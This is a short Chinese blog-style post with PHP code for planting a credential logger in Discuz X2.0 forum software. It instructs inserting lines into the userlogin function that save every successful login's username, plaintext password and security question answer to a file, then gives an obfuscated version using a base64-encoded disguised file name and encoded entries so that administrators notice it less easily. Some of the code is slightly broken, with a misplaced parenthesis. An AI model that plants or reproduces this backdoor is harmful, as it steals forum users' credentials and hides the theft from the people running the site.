DZx2.0 密码记录
//打开source/function/function_member.php
//找到function userlogin
//在return $return;前面加上
$a=file_get_contents(dirname(__FILE__).’/1.txt’);
file_put_contents(dirname(__FILE__).’/1.txt’),$a.”Id:”.$username.”—-Psw:”.$password.”—-question:”.$questionid.”—-Answer:”.$answer.”\r\n”);
//记录登陆成功的账号密码以及问题答案!保存在source/function/目录下的1.txt
?>
一般上面的这样容易发现,我会把1.txt改名,并且base64_encode之后再保存。
//base64_encode之后再保存。
$a = file_get_contents(dirname(__FILE__).base64_decode(‘L2Z1bmN0aW9uX2NhY2hlLnR4dA==’));
file_put_contents(dirname(__FILE__).base64_decode(‘L2Z1bmN0aW9uX2NhY2hlLnR4dA==’),$a.base64_encode(“Id:”.$username.”—-Psw:”.$password.”—-question:”.$questionid.”—-Answer:”.$answer).”\r\n”);
?>
下一篇:URL传值符号转换